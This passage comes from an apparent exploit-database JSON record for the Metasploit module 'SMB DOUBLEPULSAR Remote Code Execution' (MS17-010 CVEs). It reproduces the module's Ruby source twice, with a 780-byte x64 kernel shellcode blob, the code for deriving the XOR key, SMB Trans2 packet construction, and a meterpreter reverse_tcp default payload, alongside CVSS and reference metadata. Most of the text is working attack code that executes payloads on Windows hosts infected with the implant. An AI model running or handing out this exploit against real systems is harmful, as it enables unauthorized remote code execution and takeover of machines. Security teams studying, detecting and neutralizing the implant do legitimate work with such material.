proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n 
pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n 
\"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n 
\"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-09-06] #"}, "lastseen": "2021-09-05T22:11:00", "differentElements": ["sourceData"], "edition": 8}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "56883ce7412d8efc8b83588900278f4f", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as 
popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0147"], "immutableFields": [], "lastseen": "2021-09-07T06:15:22", "history": [], "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142602", "PACKETSTORM:154690", "PACKETSTORM:142603", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:142181"]}, {"type": "rapid7community", 
"idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-29702", "1337DAY-ID-27802", "1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-27803", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:43970"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "SMB_DOUBLE_PULSAR_BACKDOOR_DETECT.NBIN", "700059.PRM", "700099.PRM"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96706", "SMNTC-96704", "SMNTC-96709", "SMNTC-96703", "SMNTC-96705", "SMNTC-96707"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", 
"idList": ["TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104"]}, {"type": "mmpc", "idList": ["MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0144", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "avleonov", "idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34"]}], "modified": "2021-09-07T06:15:22", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T06:15:22", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: 
https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = GreatRanking\r\n\r\n include Msf::Exploit::Remote::SMB::Client\r\n include Msf::Module::Deprecated\r\n\r\n moved_from 'exploit/windows/smb/doublepulsar_rce'\r\n\r\n MAX_SHELLCODE_SIZE = 4096\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\r\n 'Description' => %q{\r\n This module executes a Metasploit payload against the Equation Group's\r\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\r\n\r\n While this module primarily performs code execution against the implant,\r\n the \"Neutralize implant\" target allows you to disable the implant.\r\n },\r\n 'Author' => [\r\n 'Equation Group', # DOUBLEPULSAR implant\r\n 'Shadow Brokers', # Equation Group dump\r\n 'zerosum0x0', # DOPU analysis and detection\r\n 'Luke Jennings', # DOPU analysis and detection\r\n 'wvu', # Metasploit module and arch detection\r\n 'Jacob Robles' # Metasploit module and RCE help\r\n ],\r\n 'References' => [\r\n ['MSB', 'MS17-010'],\r\n ['CVE', '2017-0143'],\r\n ['CVE', '2017-0144'],\r\n ['CVE', '2017-0145'],\r\n ['CVE', '2017-0146'],\r\n ['CVE', '2017-0147'],\r\n ['CVE', '2017-0148'],\r\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\r\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\r\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\r\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\r\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\r\n ],\r\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'win',\r\n 'Arch' => ARCH_X64,\r\n 'Privileged' => 
true,\r\n 'Payload' => {\r\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\r\n 'DisableNops' => true\r\n },\r\n 'Targets' => [\r\n ['Execute payload (x64)',\r\n 'DefaultOptions' => {\r\n 'EXITFUNC' => 'thread',\r\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\r\n }\r\n ],\r\n ['Neutralize implant',\r\n 'DefaultOptions' => {\r\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'Notes' => {\r\n 'AKA' => ['DOUBLEPULSAR'],\r\n 'RelatedModules' => [\r\n 'auxiliary/scanner/smb/smb_ms17_010',\r\n 'exploit/windows/smb/ms17_010_eternalblue'\r\n ],\r\n 'Stability' => [CRASH_OS_DOWN],\r\n 'Reliability' => [REPEATABLE_SESSION]\r\n }\r\n ))\r\n\r\n register_advanced_options([\r\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\r\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\r\n ])\r\n end\r\n\r\n OPCODES = {\r\n ping: 0x23,\r\n exec: 0xc8,\r\n kill: 0x77\r\n }.freeze\r\n\r\n STATUS_CODES = {\r\n not_detected: 0x00,\r\n success: 0x10,\r\n invalid_params: 0x20,\r\n alloc_failure: 0x30\r\n }.freeze\r\n\r\n def calculate_doublepulsar_status(m1, m2)\r\n STATUS_CODES.key(m2.to_i - m1.to_i)\r\n end\r\n\r\n # algorithm to calculate the XOR Key for DoublePulsar knocks\r\n def calculate_doublepulsar_xor_key(s)\r\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\r\n x & 0xffffffff # this line was added just to truncate to 32 bits\r\n end\r\n\r\n # The arch is adjacent to the XOR key in the SMB signature\r\n def calculate_doublepulsar_arch(s)\r\n s == 0 ? 
ARCH_X86 : ARCH_X64\r\n end\r\n\r\n def generate_doublepulsar_timeout(op)\r\n k = SecureRandom.random_bytes(4).unpack1('V')\r\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\r\n end\r\n\r\n def generate_doublepulsar_param(op, body)\r\n case OPCODES.key(op)\r\n when :ping, :kill\r\n \"\\x00\" * 12\r\n when :exec\r\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\r\n end\r\n end\r\n\r\n def check\r\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\r\n\r\n @tree_id = do_smb_setup_tree(ipc_share)\r\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\r\n vprint_status(\"Target OS is #{smb_peer_os}\")\r\n\r\n print_status('Sending ping to DOUBLEPULSAR')\r\n code, signature1, signature2 = do_smb_doublepulsar_pkt\r\n msg = 'Host is likely INFECTED with DoublePulsar!'\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n @xor_key = calculate_doublepulsar_xor_key(signature1)\r\n @arch = calculate_doublepulsar_arch(signature2)\r\n\r\n arch_str =\r\n case @arch\r\n when ARCH_X86\r\n 'x86 (32-bit)'\r\n when ARCH_X64\r\n 'x64 (64-bit)'\r\n end\r\n\r\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\r\n CheckCode::Vulnerable\r\n when :not_detected\r\n print_error('DOUBLEPULSAR not detected or disabled')\r\n CheckCode::Safe\r\n else\r\n print_error('An unknown error occurred')\r\n CheckCode::Unknown\r\n end\r\n end\r\n\r\n def exploit\r\n if datastore['DefangedMode']\r\n warning = <<~EOF\r\n\r\n\r\n Are you SURE you want to execute code against a nation-state implant?\r\n You MAY contaminate forensic evidence if there is an investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to 
proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n 
